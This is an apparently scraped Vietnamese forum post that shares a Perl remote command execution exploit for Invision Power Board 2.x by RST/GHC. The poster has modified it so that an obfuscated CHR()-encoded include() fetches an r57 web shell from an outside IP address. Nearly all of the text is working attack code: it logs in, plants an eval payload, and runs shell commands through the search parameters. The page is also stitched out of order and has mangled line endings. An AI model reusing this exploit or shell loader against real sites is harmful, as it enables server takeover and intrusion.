"[-] CONNECTION FAILED"; $created = 0; $text = 'piptest2eval(include(CHR(104).CHR(116).CHR(116).CHR(112).CHR(58) .CHR(47).CHR(47).CHR(54).CHR(54).CHR(46).CHR(49).CHR(57).CHR(57).CH R(46).CHR(49).CHR(56).CHR(49).CHR(46).CHR(49).CHR(52).CHR(52).CHR(4 7).CHR(126).CHR(100).CHR(101).CHR(109).CHR(111).CHR(100).CHR(101).C HR(109).CHR(111).CHR(47).CHR(109).CHR(105).CHR(115).CHR(99).CHR(46) .CHR(116).CHR(120).CHR(116))); //'; $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeatta chid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_qu estion=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid =0"; print $sock "POST ${dir}index.php HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/Location:/) { $created = 1; last; } } if($created) { print " [ DONE ]rn"; } else { print " [ FAILED ]rn"; exit(); } $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; print "[~] Search message "; $post = 'keywords=piptest2&namesearch='.$login.'&forums%5B%5D=all&search subs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&sear ch_in=posts&result_type=posts'; print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closern"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "Content-length: ".length($post)."rnrn"; print $sock "$post"; print $sock "rnrn"; while (<$sock>) { if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; } } if($searchid) { print " [ DONE ]rn"; } else { print "[ FAILED ]rn"; exit(); } print "[+] SEARCHID: $searchidrn"; $get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=p osts&result_type=posts&highlite=piptest2&lastdate=z|eval.*?%20//)%23e%00'; $link_r57= $host.$dir.'index.php?act=Search&CODE=show&searchid='.$searchid .'&search_in=posts&result_type=posts&highlite=piptest2&lastdate=z|eval.*?%20// )%23e%00'; print "File's place:"; $save=<STDIN>; print "Please open $save and paste the link in that file to address bar. You're runnin g r57, help fun !"; open OUTPUT, ">".$save; print OUTPUT "$link_r57"; sub run() { $cmd =~ s/(.*);$/$1/eg; $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26% 20'; $cmd2 .= $cmd; $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F'; $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1rn"; print $sock "Host: $hostrn"; print $sock "Cookie: session_id=$sid;rn"; print $sock "Connection: closernrn"; $on = 0; $runned = 0; while ($answer = <$sock>) { if ($answer =~ /^_END_/) { return 0; } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } } sub header() { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~rn"; print " Invision Power Board 2.* commands execution exploit by RST/GHCrn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~rn"; } sub usage() { print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> - v <version>rnrn"; print "<host> - host where IPB installed e.g www.ipb.comrn"; print "<dir> - folder where IPB installed e.g. /forum/ , /ipb/ , etc rn"; print "<login> - login of any exist userrn"; print "<password> - and password too )rn"; print "<forum> - number of forum where user can create topic e.g 2,4, etcrn"; print "<version> - forum version:rn"; print " 0 - 2.0.*rn"; print " 1 - 2.1.*rn"; exit(); } __________________ pip(VNISS) Invision Power Board Multiple Vulnerabilities (bài 6) DÙng cái naycó luôn con r57 đỡ wget làm gì cho mệt (quảng cáo hehe ) PHP Code: #!/usr/bin/perl ## Invision Power Board 2.* commands execution exploit by RST/GHC ## vulnerable versions <= 2.1.5 ## tested on 2.1.4, 2.0.2 ## ## (c)oded by 1dt.w0lf ## RST/GHC ## http://rst.void.ru ## http://ghc.ru use IO::Socket; use Getopt::Std; getopts("l:h:p:d:f:v:"); $host = $opt_h; $dir = $opt_d; $login = $opt_l; $password = $opt_p; $forum = $opt_f; $version = $opt_v || 0; $|++; header(); if(!$host||!$dir||!$login||!$password||!$forum) { usage(); } print "[~] SERVER : $host\r\n"; print "[~] PATH : $dir\r\n"; print "[~] LOGIN : $login\r\n"; print "[~] PASSWORD : $password\r\n"; print "[~] TARGET : $version"; print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*')); print "\r\n"; print "[~] Login "; $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; $login =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $post = 'UserName='.$login.'&PassWord='.$password; $loggedin = 0; print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Connection: close\r\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Content-length: ".length($post)."\r\n\r\n"; print $sock "$post"; print $sock "\r\n\r\n"; while (<$sock>) { if(/session_id=([a-f|0-9]{32})/) { $sid = $1; } } $sock = IO::Socket::INET- >new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[- ] CONNECTION FAILED"; print $sock "GET ${dir}index.php HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n"; print $sock "Connection: close\r\n\r\n"; while (<$sock>) { if(/act=Login&amp;CODE=03/) { $loggedin = 1; last; } } if($loggedin) { print " [ DONE ]\r\n"; } else { print " [ FAILED ]\r\n"; exit(); } print "[+] SID: $sid\r\n"; print "[~] Try get md5_check ";